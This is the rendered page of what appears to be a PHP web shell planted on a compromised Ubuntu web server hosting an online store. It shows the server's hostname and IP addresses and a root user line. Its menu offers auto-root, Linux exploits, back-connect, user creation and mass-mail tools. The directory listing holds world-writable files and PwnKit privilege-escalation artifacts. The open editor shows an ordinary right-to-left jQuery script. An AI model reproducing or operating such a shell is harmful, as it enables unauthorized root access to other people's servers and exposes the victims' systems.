Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
tienda /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxrwxrwx
cropper
[ DIR ]
drwxrwxrwx
jquery
[ DIR ]
drwxrwxrwx
tiny_mce
[ DIR ]
drwxrwxrwx
vendor
[ DIR ]
drwxrwxrwx
.htaccess
290
B
-rwxrwxrwx
.mad-root
0
B
-rw-r--r--
admin-categories-tree.js
9.26
KB
-rwxrwxrwx
admin.js
52.33
KB
-rwxrwxrwx
date.LICENSE
34.94
KB
-rwxrwxrwx
date.js
11.25
KB
-rwxrwxrwx
fileuploader.LICENSE
786
B
-rwxrwxrwx
fileuploader.js
32.21
KB
-rwxrwxrwx
index.php
1.29
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
retro-compat.js.php
6.65
KB
-rwxrwxrwx
rtl.LICENSE
1.05
KB
-rwxrwxrwx
rtl.js
1.7
KB
-rwxrwxrwx
tools.js
22.71
KB
-rwxrwxrwx
unicode_hack.LICENSE
311
B
-rwxrwxrwx
validate.js
21.3
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rtl.js
/* * dmartl.js * DM Auto RTL - Auto RTL all inline style in page using jquery * Autor: Danoosh Miralayi * Website: presta-shop.ir * License: MIT * Find it here: https://github.com/Danoosh/DM-Auto-RTL */ $(document).ready(function () { var exceptionId = [ "step-1" ]; $('[style]').each(function (index) { if (exceptionId.indexOf($(this).attr('id')) === -1) { var styles_old = $(this).attr('style'); styles_old = styles_old.split(';').filter(item => item); var styles = {}; var s = ''; var i = ''; var v = ''; if (styles_old.indexOf('background-image') !== -1) { for (var x = 0, l = styles_old.length; x < l; x++) { s = styles_old[x].split(':'); i = $.trim(s[0]); styles[makeGeneralRTL(i)] = makeValueRTL(i, $.trim(s[1])); } $(this).removeAttr("style"); $(this).css(styles); } } }); }); function makeGeneralRTL(index) { var res = index.replace(/right/g, "rtemp"); res = res.replace(/left/g, "right"); res = res.replace(/rtemp/g, "left"); return res; } function makeValueRTL(property, value) { if (property.match(/text-align|float/)) { return makeGeneralRTL(value); } if (property.match(/^background(-position)?$/)) return value.replace(/^((?!#\((.*)\)).)*$/, ' ') + makeGeneralRTL(value.replace(/(\s)?url\((.*)\)(\s)?/, '')); if (property.match(/margin|padding/) && value.match(/(\S*) (\S*) (\S*) (\S*)/)) return value.replace(/(\S*) (\S*) (\S*) (\S*)/, "$1 $4 $3 $2"); return value; } /* end of file dmartl.js */
Close